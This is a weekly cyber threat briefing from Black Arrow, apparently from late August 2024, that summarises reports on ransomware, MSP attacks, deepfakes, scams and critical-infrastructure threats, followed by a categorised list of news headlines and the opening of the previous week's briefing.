-76% of Managed Service Providers (MSPs) Faced an Infrastructure Cyber Attack in Last 12 Months
-Third-Party Risk Management is Under the Spotlight
-46% of Enterprises Experience Four or More Ransomware Attacks in a Single Year, Affecting ERP Applications and Systems 89% of the Time
-Cyber Security Spending is Going to Surge in 2025, and AI Threats are a Key Factor
-Aggressively Monitoring for Changes Is a Key Aspect of Cyber Security
-Half of Enterprises Suffer Breaches Despite Heavy Security Investments
-Why the 80-20 Rule No Longer Works for Cyber Security
-Deepfakes: Seeing is No Longer Believing
-Online Scam Cycles are Getting Shorter and More Effective
-Cyber Attacks on Critical Infrastructure Increased by 30% in One Year
-Russia is Signalling It Could Take Out the West's Internet and GPS. There's No Good Backup Plan
-NATO Believes Russia Poses a Threat to the West’s Internet and GPS Services
-Cyber Attacks on UK Law Firms Surge by 77% Amid Rising Ransomware Threat
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.
Top Cyber Stories of the Last Week
76% of Managed Service Providers (MSPs) Faced an Infrastructure Cyber Attack in Last 12 Months
A recent report by Netwrix highlights that 76% of Managed Service Providers (MSPs) experienced a cyber attack on their infrastructure in the past 12 months, mirroring the 79% seen across all organisations. Of those attacked, 51% incurred unplanned expenses to address security gaps, while 31% suffered a loss of competitive edge, and 27% faced compliance fines - higher than the averages in other sectors. Notably, nearly half (49%) of cloud security incidents involved user account compromises, while 46% of on-premises attacks were related to ransomware or other malware. These findings underscore the critical need for robust security measures in the MSP sector.
Third-Party Risk Management is Under the Spotlight
Recent research highlights a critical vulnerability in the financial sector's digital supply chain resilience, exposed by the recent CrowdStrike IT outage. Despite regulatory pressure from bodies such as the Bank of England and the EU's Digital Operational Resilience Act (DORA), only 20.8% of financial professionals report having stressed exit plans in most third-party agreements, crucial for managing risks from supplier disruptions. With DORA set to be implemented by January 2025, the findings are concerning, as less than 19% of respondents expressed complete confidence in their third-party exit strategies, underscoring the urgent need for improved operational resilience in financial services.
46% of Enterprises Experience Four or More Ransomware Attacks in a Single Year, Affecting ERP Applications and Systems 89% of the Time
Onapsis has revealed that 83% of organisations have faced at least one ransomware attack in the past year, with 46% experiencing four or more, and 14% facing ten or more attacks. Notably, 89% of these attacks impacted Enterprise Resource Planning (ERP) systems, leading to significant business disruptions, with 61% of attacks resulting in at least 24 hours of downtime. As AI-enhanced threats grow, the impact on ERP systems is expected to worsen. The research underscores the inadequacy of generic security solutions, with 93% of respondents agreeing on the need for dedicated ERP security to protect business-critical applications.
Cyber Security Spending is Going to Surge in 2025, and AI Threats are a Key Factor
Gartner's latest research predicts a significant rise in global cyber security spending, expected to reach $183.9 billion in 2024 and increase by 15.1% to $212 billion in 2025. This surge is driven by the adoption of generative AI tools, which are heightening investments in application, data, and infrastructure security. The use of large language models (LLMs) in large-scale social engineering attacks is anticipated to contribute to 17% of cyber attacks or data leaks by 2027. Additionally, the growing shift to cloud services is expected to boost demand for cloud security solutions, with the Cloud Access Security Broker (CASB) and Cloud Workload Protection Platform (CWPP) market projected to hit $8.7 billion by 2025.
Aggressively Monitoring for Changes Is a Key Aspect of Cyber Security
Effective cyber security relies on multiple layers of defence, with file integrity monitoring and change detection being two of the most crucial. These layers are managed through an organisation's change management programme, which ensures that changes are carefully planned, tested, documented, and approved. In the past, making undocumented changes without oversight was common, but today, such practices are a fast track to unemployment. Modern change management involves detailed coordination and approval processes, often by committees, to minimise risks and prevent disruptions to business operations. These layers, while essential, underscore that no system is entirely risk-free.
Half of Enterprises Suffer Breaches Despite Heavy Security Investments
Recent reports indicate a sharp rise in data breach frequency and costs, with the average breach now costing $4.88 million, a 10% increase from the previous year. Notably, 40% of breaches involve data spread across multiple environments, including cloud and on-premises, taking an average of 283 days to identify and contain. Despite having extensive security measures, 51% of enterprises still reported breaches in the last 24 months, with 93% experiencing significant disruptions. Human error remains a critical factor, contributing to 68% of breaches. Additionally, 98% of businesses are linked to breaches through third-party relationships, highlighting the need for robust security across the supply chain.
Why the 80-20 Rule No Longer Works for Cyber Security
A recent analysis challenges the application of the Pareto Principle in cyber security, highlighting that monitoring only 80% of assets leaves organisations significantly exposed. The report reveals that over 90% of CISOs acknowledge breaches are more likely to originate from unknown or unmanaged assets rather than well-monitored ones. Using the metaphor of a ship with unchecked sections, the study emphasises that neglecting even a small percentage of assets can lead to catastrophic outcomes. It questions why some security leaders persist with this approach, given that the unmonitored 20% often contains the most exploitable vulnerabilities. The findings underscore the critical need for comprehensive asset management to effectively mitigate cyber risks.
Deepfakes: Seeing is No Longer Believing
The rising threat of deepfakes is significantly impacting organisations and public trust, with 47% of companies having encountered deepfakes and 70% believing these AI-generated attacks could heavily affect them. Despite 73% of organisations implementing measures against deepfakes, confidence in these defences remains low, with 62% fearing their efforts are insufficient. Public concern is also high, with 81% of Americans worried about the impact of deepfakes on election integrity. However, many people overestimate their ability to detect deepfakes, with 60% believing they could identify one, despite the increasing sophistication of these AI-generated threats.
Online Scam Cycles are Getting Shorter and More Effective
A recent Chainalysis mid-year report highlights that online scam cycles have become significantly shorter and more effective, with cyber criminals increasingly favouring smaller, faster, and more targeted campaigns. The report reveals that 43% of scam revenues on the blockchain were sent to wallets created within the past year, a sharp rise from 29.9% in 2022. This shift indicates a surge in newly launched scams, with the average duration of scams dropping from 271 days in 2020 to just 42 days in 2024. This trend underscores the growing agility and sophistication of cyber criminals in executing their fraudulent activities.
Cyber Attacks on Critical Infrastructure Increased by 30% in One Year
A recent report from KnowBe4 reveals a significant 30% increase in cyber attacks on critical infrastructure, amounting to over 420 million attacks between January 2023 and 2024, or approximately 13 attacks every second. Globally, the weekly average of cyber incidents has quadrupled since 2020, with a doubling just in 2023. The report also highlights growing vulnerabilities in the US power grid, with around 60 new vulnerable points emerging daily, raising the total from 21,000 in 2022 to approximately 24,000. These findings underscore the escalating risks facing critical infrastructure and the urgent need for enhanced security measures.
Russia is Signalling It Could Take Out the West's Internet and GPS. There's No Good Backup Plan
NATO intelligence officials have raised concerns that Russia may disrupt global internet and GPS networks, with recent reports suggesting that Russia is mapping undersea fibre optic cables, which carry 95% of international data. Russia's deputy chairman of the Security Council, Dmitry Medvedev, issued a stark warning after the Nord Stream 2 pipeline attack, suggesting Russia could target these vital communications links. Incidents such as the disruption of telecommunications between Sweden and Estonia in 2023 and the grounding of flights due to GPS interference highlight the growing threat. NATO is increasing surveillance, but experts stress the urgent need for resilient backup systems to protect against potential cyber attacks on this critical infrastructure.
Cyber Attacks on UK Law Firms Surge by 77% Amid Rising Ransomware Threat
A recent study has revealed a 77% increase in successful cyber attacks on UK law firms over the past year, rising from 538 to 954 incidents. Law firms are particularly attractive targets for cyber criminals due to the sensitive and valuable data they hold, leading to frequent ransomware attacks and blackmail attempts. According to a report by the UK’s National Cyber Security Centre, nearly three-quarters of the UK’s top 100 law firms have been impacted by cyber-attacks. The average ransom demand following an attack is $2.47 million, with firms typically paying $1.65 million. Despite the escalating threat, 35% of UK law firms still lack a cyber mitigation plan. Experts recommend stronger cyber defences, including data segregation, to better protect against these attacks.
Sources:
https://www.helpnetsecurity.com/2024/08/29/third-party-risk-management-spotlight/
https://www.helpnetsecurity.com/2024/08/27/data-breach-trends/
https://www.scmagazine.com/perspective/why-the-80-20-rule-no-longer-works-for-cybersecurity
https://www.helpnetsecurity.com/2024/08/29/deepfakes-technology-threat/
https://cyberscoop.com/online-scamming-cycles-shorter-more-effective-chainalysis/
https://www.businessinsider.com/russia-could-take-out-west-internet-gps-back-up-plan-2024-8
https://informationsecuritybuzz.com/cyberattacks-uk-law-firms-ransomware/
Governance, Risk and Compliance
How hard is it to navigate and comply with global cyber security regulations? | Business Wire
Cyber attacks on law firms jumped by 77% over the past year | Law Gazette
Half of enterprises suffer breaches despite heavy security investments - Help Net Security
Why the 80-20 rule no longer works for cyber security | SC Media (scmagazine.com)
Evolving Cyber Security: Aligning Strategy with Business Growth - Security Boulevard
Global Cyber Security spending to surge by 15% next year (electronicspecifier.com)
Cyber security spending is going to surge in 2025 – and AI threats are a key factor | ITPro
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Third-party risk management is under the spotlight - Help Net Security
European Agencies are Taking Cyber Security Seriously and Your Business Should, Too | Entrepreneur
Why cyber risk quantification is ‘becoming more mainstream’ - Security - CRN Australia
Boards Need a New Approach to Technology
If you’re a CISO without D&O insurance, you may need to fight for it | CSO Online
Cyber Security Maturity: A Must-Have on the CISO’s Agenda - SecurityWeek
Business leaders are losing faith in IT, according to this IBM study. Here's why | ZDNET
Cyber Hygiene: Constant Defence Against Evolving B2B Threats (pymnts.com)
6 hot cyber security trends — and 2 going cold | CSO Online
US firms see spike in cyber security services as data breaches increase: ISG - Reinsurance News
Why Companies Need Real-Time Compliance (informationsecuritybuzz.com)
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
BlackSuit Ransomware Threat Actors Demand Up To $500 Million - Security Boulevard
BlackSuit Ransomware Deployed After 15 Days From Initial Access (cybersecuritynews.com)
Ransomware Attacks, Demands, And Payments Rise In Q2 (informationsecuritybuzz.com)
Lateral movement: Clearest sign of unfolding ransomware attack - Help Net Security
Ransomware Group Defences Are Better Than Fortune 100 Firms (govinfosecurity.com)
FBI: RansomHub ransomware breached 210 victims since February (bleepingcomputer.com)
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Threat Group 'Bling Libra' Pivots to Extortion for Cloud Attacks (darkreading.com)
BlackByte Ransomware Exploits VMware ESXi Flaw in Latest Attack Wave (thehackernews.com)
Pioneer Kitten: Iranian hackers partnering with ransomware affiliates - Help Net Security
PoorTry Windows driver evolves into a full-featured EDR wiper (bleepingcomputer.com)
Ransomware attacks increasingly target ERP systems (securitybrief.co.nz)
'Big-game hunting' - Ransomware gangs are focusing on more lucrative attacks - Exponential-e Blog
77% of Educational Institutions Spotted a Cyber Attack Within the Last 12 Months (darkreading.com)
Ransomware Victims
US oil giant Halliburton confirms cyber attack behind systems shutdown (bleepingcomputer.com)
BlackSuit ransomware stole data of 950,000 from software vendor (bleepingcomputer.com)
Hunters International ransomware gang threatens to leak US Marshals data | SC Media (scmagazine.com)
Blood donation: NHS stocks are still in short supply after June cyber attack | The BMJ
Cyber attack disrupts Seattle’s Tacoma International Airport and seaport - The Hindu
Ransomware Gang Leaks Data Allegedly Stolen From Microchip Technology - SecurityWeek
77% of Educational Institutions Spotted a Cyber Attack Within the Last 12 Months (darkreading.com)
Patelco confirms thousands of customers hit in ransomware attack | TechRadar
McLaren Health Care restores network weeks after ransomware attack | Healthcare Dive
Play ransomware hackers claim attack on US manufacturer Microchip Technology (therecord.media)
Phishing & Email Based Attacks
Widespread QR Code Phishing Targeted Microsoft 365 Credentials | MSSP Alert
File sharing phishing attacks increase 350 percent (betanews.com)
PSA: Watch out for phishing attacks with fake banking app updates - 9to5Mac
Attackers exploiting trust in VPNs for phishing attacks | Cybernews
How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back (thehackernews.com)
Spoofing: What It Is And How To Spot It | HuffPost Life
2.5 Million Reward Offered For Cyber Criminal Linked To Notorious Angler Exploit Kit | Tripwire
Other Social Engineering
Scammers are increasingly using messaging and social media apps to attack | ZDNET
AI voice generators: What they can do and how they work | ZDNET
Deepfakes: Seeing is no longer believing - Help Net Security
Powerful Spyware Exploits Enable a New String of 'Watering Hole' Attacks | WIRED
Don’t call it quishing but, please, do take it seriously | TechFinitive
Spoofing: What It Is And How To Spot It | HuffPost Life
How Telecom Vulnerabilities Can Be a Threat to Cyber Security Posture (darkreading.com)
Widespread QR Code Phishing Targeted Microsoft 365 Credentials | MSSP Alert
Threat actor lures victims to malware-laden VPN page via call, text | SC Media (scmagazine.com)
Artificial Intelligence
AI voice generators: What they can do and how they work | ZDNET
Deepfakes: Seeing is no longer believing - Help Net Security
Cyber security spending is going to surge in 2025 – and AI threats are a key factor | ITPro
1 in 5 top companies mention generative AI in their financial reports, but not in a good way | ZDNET
Why LLMs Are Just the Tip of the AI Security Iceberg (darkreading.com)
News Desk 2024: Hacking Microsoft Copilot Is Scary Easy (darkreading.com)
6 hot cyber security trends — and 2 going cold | CSO Online
OpenAI and Anthropic to collaborate with US government on AI safety | ZDNET
2FA/MFA
How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back (thehackernews.com)
How Telecom Vulnerabilities Can Be a Threat to Cyber Security Posture (darkreading.com)
Malware
Hackers infect ISPs with malware that steals customers’ credentials | Ars Technica
A new macOS data stealer is going after Apple users | TechRadar
Cthulhu Stealer malware aimed to take macOS user data (appleinsider.com)
New Linux Malware 'sedexp' Hides Credit Card Skimmers Using Udev Rules (thehackernews.com)
MacOS Malware Mimicked Popular Apps to Steal Passwords, Crypto Wallets (pcmag.com)
Microsoft: Exchange Online mistakenly tags emails as malware (bleepingcomputer.com)
This sneaky Linux malware went undetected for years, and is using all-new attack tactics | TechRadar
New vulnerabilities, infostealer compromise on the rise | SC Media (scmagazine.com)
Hackers linked to Russian government found using some very familiar malware tools | TechRadar
Fake Palo Alto GlobalProtect used as lure to backdoor enterprises (bleepingcomputer.com)
Threat actor lures victims to malware-laden VPN page via call, text | SC Media (scmagazine.com)
New Tickler malware used to backdoor US govt, defence orgs (bleepingcomputer.com)
Hackers Exploited Digital Marketing Tools to Launch Malicious Campaigns (cybersecuritynews.com)
New Cyber Attack Targets Chinese-Speaking Businesses with Cobalt Strike Payloads (thehackernews.com)
Mobile
Attackers draining bank accounts using new Android card cloning malware | Cybernews
PSA: Watch out for phishing attacks with fake banking app updates - 9to5Mac
Denial of Service/DoS/DDOS
Mind the Geopolitical Bot: Defending Digitalisation in an Era of Mass Disruption (institute.global)
Internet of Things – IoT
Unpatchable 0-day in surveillance cam is being exploited to install Mirai | Ars Technica
Data Breaches/Leaks
A third of companies hit by data breach amid rising concerns (securitybrief.co.nz)
5 Of The Biggest Security Breaches To Ever Hit Microsoft (slashgear.com)
NHS staff mobile numbers revealed in data breach - BBC News
Scottish health boards hit by cyber-attack (holyrood.com)
500k Impacted by Texas Dow Employees Credit Union Data Breach - SecurityWeek
AMD data reportedly offered for sale on dark web souk • The Register
Hackers claim to have hit US Marshals Service with a major cyber attack | TechRadar
Park’N Fly notifies 1 million customers of data breach (bleepingcomputer.com)
Patelco confirms thousands of customers hit in ransomware attack | TechRadar
DICK’s Sporting Goods says confidential data exposed in cyber attack (bleepingcomputer.com)
Staff details stolen in Banham Poultry cyber attack - BBC News
Watchdog warns FBI is very sloppy on safe data storage • The Register
Organised Crime & Criminal Actors
Ransomware Group Defences Are Better Than Fortune 100 Firms (govinfosecurity.com)
Greasy Opal's CAPTCHA solver still serving cyber crime after 16 years (bleepingcomputer.com)
Telegram: Why Extremists, Criminal Activity Thrive on Chat App - Bloomberg
Hacker USDoD Sheds Light on Identity | MSSP Alert
Adversaries love bots, short-lived IP addresses, out-of-band domains - Help Net Security
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
MacOS Malware Mimicked Popular Apps to Steal Passwords, Crypto Wallets (pcmag.com)
Attackers Exploit Critical Atlassian Confluence Flaw for Cryptojacking (darkreading.com)
Crypto scammers who hacked McDonald's Instagram account say they stole $700,000 (bitdefender.com)
Insider Risk and Insider Threats
Microsoft security tools probed for workplace surveillance • The Register
Insurance
Meeting The New Cyber Insurance Requirements (informationsecuritybuzz.com)
If you’re a CISO without D&O insurance, you may need to fight for it | CSO Online
Cyber Insurance: A Few Security Technologies, a Big Difference in Premiums (darkreading.com)
Insurer Seeks to Rescind Policy Over Privacy Law Compliance (bloomberglaw.com)
Supply Chain and Third Parties
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Third-party risk management is under the spotlight - Help Net Security
76% of MSPs faced an infrastructure cyber attack in last 12 months | Security Magazine
BlackSuit ransomware stole data of 950,000 from software vendor (bleepingcomputer.com)
Supply Chain Security for FinServ - ActiveState
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Cloud/SaaS
File sharing phishing attacks increase 350 percent (betanews.com)
SaaS security woes continue to haunt cyber teams | ITPro
How to Strengthen Your SaaS Security Posture Management - Security Boulevard
Threat Group 'Bling Libra' Pivots to Extortion for Cloud Attacks (darkreading.com)
Enterprise SaaS apps are still a major security risk | TechRadar
When Convenience Costs: CISOs Struggle With SaaS Security Oversight - SecurityWeek
Cyber criminals capitalize on travel industry's peak season - Help Net Security
Outages
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Third-party risk management is under the spotlight - Help Net Security
Supply Chain Security for FinServ - ActiveState
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Identity and Access Management
Why ransomware attackers target Active Directory - Help Net Security
The Evolving Landscape Of Identity And Access Management In 2024 (informationsecuritybuzz.com)
Encryption
Denmark wants to ban encrypted Telegram, Signal chats | Cybernews
Linux and Open Source
New Linux Malware 'sedexp' Hides Credit Card Skimmers Using Udev Rules (thehackernews.com)
Linux malware sedexp uses udev rules for persistence and evasion (securityaffairs.com)
This sneaky Linux malware went undetected for years, and is using all-new attack tactics | TechRadar
Passwords, Credential Stuffing & Brute Force Attacks
MacOS Malware Mimicked Popular Apps to Steal Passwords, Crypto Wallets (pcmag.com)
Widespread QR Code Phishing Targeted Microsoft 365 Credentials | MSSP Alert
If You're Still Using This Insecure Password Method, It's Time to Stop (makeuseof.com)
Social Media
Scammers are increasingly using messaging and social media apps to attack | ZDNET
Telegram Founder Pavel Durov Arrested in France for Content Moderation Failures (thehackernews.com)
Malvertising
Hackers Exploited Digital Marketing Tools to Launch Malicious Campaigns (cybersecuritynews.com)
Regulations, Fines and Legislation
Uber Hit With €290m GDPR Fine - Infosecurity Magazine (infosecurity-magazine.com)
UK Labour Party reprimanded over cyber attack backlog by privacy regulator (therecord.media)
The NIS2 Directive: How far does it reach? - Help Net Security
Cyber law reform should be top of Labour's policy list | Computer Weekly
Lawmakers must incentivize cyber protection for critical infrastructure | CyberScoop
Models, Frameworks and Standards
The NIS2 Directive: How far does it reach? - Help Net Security
NIS2 Directive: Focusing on Critical Infrastructure Security (govinfosecurity.com)
5 open source Mitre ATT&CK tools | TechTarget
Data Protection
Uber Hit With €290m GDPR Fine - Infosecurity Magazine (infosecurity-magazine.com)
UK Labour Party reprimanded over cyber attack backlog by privacy regulator (therecord.media)
Watchdog reprimands Labour following data protection breach - BBC News
Law Enforcement Action and Take Downs
Telegram Founder Pavel Durov Arrested in France for Content Moderation Failures (thehackernews.com)
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Telegram CEO arrest is fuzzy warning to Big Tech | Reuters
Stakes high for European Union after arrest of Telegram co-founder | European Union | The Guardian
Russia-France ties hit new low after Telegram boss' arrest, Moscow says | Reuters
Telegram is a bigger headache than Elon Musk’s X for the EU – POLITICO
2.5 Million Reward Offered For Cyber Criminal Linked To Notorious Angler Exploit Kit | Tripwire
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
The New Frontiers of Cyber-Warfare: Insights From Black Hat 2024 (itprotoday.com)
Ramping Up Cyber Defences Against Adversarial States | AFCEA International
Military 'silent hangar' to help protect against foreign GPS jamming - GOV.UK
Nation State Actors
China
Hackers infect ISPs with malware that steals customers’ credentials | Ars Technica
Chinese government hackers infiltrate at least two top US ISPs | TechRadar
Chinese Volt Typhoon hackers exploited Versa zero-day to breach ISPs, MSPs (bleepingcomputer.com)
Chinese cyber attacks hit nearly half of German firms, study – DW – 08/28/2024
Cyber crime and sabotage cost German firms $300 bln in past year | Reuters
Hackers Use Rare Stealth Techniques to Down Asian Military, Gov't Orgs (darkreading.com)
US efforts to stop Chinese hackers haven’t been fully effective, FBI official says - Nextgov/FCW
Russia
Russia Could Take Out West's Internet, No Good Back up Plan - Business Insider
Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyber Attack (thehackernews.com)
In Russia, questions swirl over Telegram CEO's arrest - BBC News
The bewildering politics of Telegram - POLITICO
Russia's APT29 using spyware exploits in new campaigns | TechTarget
Powerful Spyware Exploits Enable a New String of 'Watering Hole' Attacks | WIRED
Latvia and Ukraine sign memorandum of understanding on cyber security | Ukrainska Pravda
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Iran
Tehran’s state-sponsored hackers helping cybergangs deploy ransomware | Cybernews
Pioneer Kitten: Iranian hackers partnering with ransomware affiliates - Help Net Security
New Tickler malware used to backdoor US govt, defence orgs (bleepingcomputer.com)
Meta Exposes Iranian Hacker Group Targeting Global Political Figures on WhatsApp (thehackernews.com)
Iran hunts down double agents with fake recruiting sites • The Register
Notorious Iranian Hackers Have Been Targeting the Space Industry With a New Backdoor | WIRED
North Korea
South Korean Spies Exploit WPS Office Zero-Day - Infosecurity Magazine (infosecurity-magazine.com)
North Korean Hackers Target Developers with Malicious npm Packages (thehackernews.com)
Russian laundering millions for Lazarus hackers arrested in Argentina (bleepingcomputer.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Telegram: Why Extremists, Criminal Activity Thrive on Chat App - Bloomberg
Cyber Attacks Deployed in Retaliation to Telegram CEO Arrest | MSSP Alert
Tools and Controls
Resilience blueprint: Strategic steps to build operational resiliency (betanews.com)
Aggressively Monitoring for Changes Is a Key Aspect of Cyber Security (darkreading.com)
Global Cyber Security spending to surge by 15% next year (electronicspecifier.com)
Third-party risk management is under the spotlight - Help Net Security
Is the vulnerability disclosure process glitched? How CISOs are being left in the dark | CSO Online
How to Strengthen Your SaaS Security Posture Management - Security Boulevard
Remote Work: A Ticking Time Bomb Waiting to be Exploited (bleepingcomputer.com)
When Convenience Costs: CISOs Struggle With SaaS Security Oversight - SecurityWeek
Combating alert fatigue by prioritizing malicious intent | SC Media (scmagazine.com)
Attackers exploiting trust in VPNs for phishing attacks | Cybernews
Ransomware attacks increasingly target ERP systems (securitybrief.co.nz)
How AitM Phishing Attacks Bypass MFA and EDR—and How to Fight Back (thehackernews.com)
Why cyber risk quantification is ‘becoming more mainstream’ - Security - CRN Australia
Cyber Insurance: A Few Security Technologies, a Big Difference in Premiums (darkreading.com)
Cyber Hygiene: Constant Defence Against Evolving B2B Threats (pymnts.com)
Supply Chain Security for FinServ - ActiveState
Two strategies to protect your business from the next large-scale tech failure - Help Net Security
Why Every Business Should Prioritize Confidential Computing (darkreading.com)
How Security Teams are Strengthening Their Threat Hunting - Security Boulevard
Why Companies Need Real-Time Compliance (informationsecuritybuzz.com)
10 key steps for crafting a robust business continuity plan (networkingplus.co.uk)
Focus on What Matters Most: Exposure Management and Your Attack Surface (thehackernews.com)
After cyber security lab wouldn’t use AV software, US accuses Georgia Tech of fraud | Ars Technica
How to use the NIST CSF and AI RMF to address AI risks | TechTarget
5 open source Mitre ATT&CK tools | TechTarget
Inside the role of a ransomware negotiator - CBS News
The art and science behind Microsoft threat hunting: Part 3 | Microsoft Security Blog
Other News
Cyber attacks on critical infrastructure increase 30 percent (betanews.com)
Cyber attacks on law firms jumped by 77% over the past year | Law Gazette
Why the 80-20 rule no longer works for cyber security | SC Media (scmagazine.com)
Evolving Cyber Security: Aligning Strategy with Business Growth - Security Boulevard
Types of hackers: Black hat, white hat, red hat and more | TechTarget
6 hot cyber security trends — and 2 going cold | CSO Online
Cyber Security Maturity: A Must-Have on the CISO’s Agenda - SecurityWeek
Top Travel Sites Have Some First-Class Security Issues to Clean Up (darkreading.com)
A macro look at the most pressing cyber security risks - Help Net Security
Cyber Accountability: US Strategy Puts Onus on Big Tech (inforisktoday.com)
Microsoft hosts a closed security summit? How transparent • The Register
Nothing to Smile About: Hacks on Dental Practices Swell (databreachtoday.co.uk)
Threat Actors Target the Middle East Using Fake Palo Alto GlobalProtect Tool | Trend Micro (US)
Cyber threats that shaped the first half of 2024 - Help Net Security
A coherent Labour cyber strategy depends on consistency | Computer Weekly
Vulnerability Management
Vulnerabilities rise in first half of 2024 (betanews.com)
Is the vulnerability disclosure process glitched? How CISOs are being left in the dark | CSO Online
New vulnerabilities, infostealer compromise on the rise | SC Media (scmagazine.com)
How to make Windows updates less annoying, in three easy steps | ZDNET
Windows 11 updates are about to become a lot easier with hotpatching | PCWorld
Cyber criminals capitalise on travel industry's peak season - Help Net Security
Vulnerabilities
SonicWall Patches Critical SonicOS Vulnerability - SecurityWeek
Chrome just patched some high-risk security flaws, so go update now | PCWorld
Microsoft Edge RCE Vulnerability Let Attackers Take Control of the System (cybersecuritynews.com)
CISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports (thehackernews.com)
PoC Exploit for Zero-Click Vulnerability Made Available to the Masses (darkreading.com)
BlackByte Ransomware Exploits VMware ESXi Flaw in Latest Attack Wave (thehackernews.com)
3CX Phone System Local Privilege Escalation Vulnerability - Security Boulevard
Attackers Exploit Critical Atlassian Confluence Flaw for Cryptojacking (darkreading.com)
Cisco Patches Multiple NX-OS Software Vulnerabilities - SecurityWeek
Update Windows now, there are some worrying security hacks on the way | TechRadar
Second Apache OFBiz Vulnerability Exploited in Attacks - SecurityWeek
WordPress Elementor Widgets Add-On Vulnerability (searchenginejournal.com)
Critical Fortra FileCatalyst Workflow vulnerability patched (CVE-2024-6633) - Help Net Security
South Korean Spies Exploit WPS Office Zero-Day - Infosecurity Magazine (infosecurity-magazine.com)
Still have a Windows 10 PC? You have 5 options before support ends next year | ZDNET
3 easy ways to make Windows updates less annoying | ZDNET
Critical Flaws in Traccar GPS System Expose Users to Remote Attacks (thehackernews.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 23 August 2024
Black Arrow Cyber Threat Intelligence Briefing 23 August 2024:
-Why C-Suite Leaders Are Prime Cyber Targets
-Most Ransomware Attacks Occur Between 1am and 5am When Security Staff are Asleep, Study Finds
-Companies are Not as Resilient as They Think, Cyber Resilience Overestimation Leads to Business Continuity Issues, Ransom Payments
-Third of Firms Put Money Aside to Pay Cyber Ransoms
-AI-Powered Cyber Threats Are Too Overpowering for Over 50% of Security Teams
-Five Novel Email Phishing Attacks and What to Do About Them
-NFC Traffic Stealer Targets Android Users and Their Banking Info
-91% of Cyber Attacks Targeted Multiple Organisations Using Mass Scanning to Uncover and Exploit Vulnerabilities
-You Really Need to Stop Using Work Laptops for Personal Use. Here's Why
-Human Nature is Causing Our Cyber Security Problem
-Cyber Crime Consolidation: The Big Fish Are Getting Bigger
-Why End of Life for Applications Is the Beginning of Life for Hackers
-Beyond Prevention: Why Breach Readiness Is Your Cyber Security Lifeline
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Why C-Suite Leaders Are Prime Cyber Targets
A recent report by GetApp reveals that 72% of surveyed cyber security professionals have observed cyber attacks targeting senior executives in the past 18 months, with incidents involving AI-generated deepfakes in 27% of cases. Despite this growing threat, 37% of companies globally do not provide specialised cyber security training for their top leaders, leaving a significant vulnerability. The report also notes a sharp rise in attack frequency, with 69% of US companies experiencing increased attacks over the past three years, higher than the global average. Over half of US firms reported at least one identity fraud incident affecting a senior executive, highlighting the urgent need for enhanced cyber security strategies, including ongoing training and advanced security tools.
Most Ransomware Attacks Occur Between 1am and 5am When Security Staff are Asleep, Study Finds
The 2024 ThreatDown State of Ransomware report by Malwarebytes reveals that ransomware attacks are increasingly timed to exploit periods when security professionals are off-duty, with most incidents occurring between 1 am and 5 am. The report highlights a 33% global increase in ransomware attacks over the past year, with the UK experiencing a 67% rise and the US a 63% increase. Traditional response measures to ransomware are proving inadequate, as threat actors now move rapidly to compromise networks. This stresses the need for continuous security coverage to keep pace with evolving ransomware tactics.
Companies are Not as Resilient as They Think, Cyber Resilience Overestimation Leads to Business Continuity Issues, Ransom Payments
Cohesity’s Global Cyber Resilience Report 2024 reveals a worrying disconnect between organisations' confidence in their cyber resilience strategies and the reality of escalating cyber threats. The survey of over 3,100 IT and security decision-makers across eight countries found that 67% of respondents had fallen victim to a ransomware attack in 2024, with 69% admitting to paying a ransom, despite 77% of these organisations having a "do not pay" policy. While 78% expressed confidence in their resilience strategies, an overwhelming 96% acknowledged that the threat to their industry had increased or would increase this year, with many willing to pay over $1 million to recover data.
Third of Firms Put Money Aside to Pay Cyber Ransoms
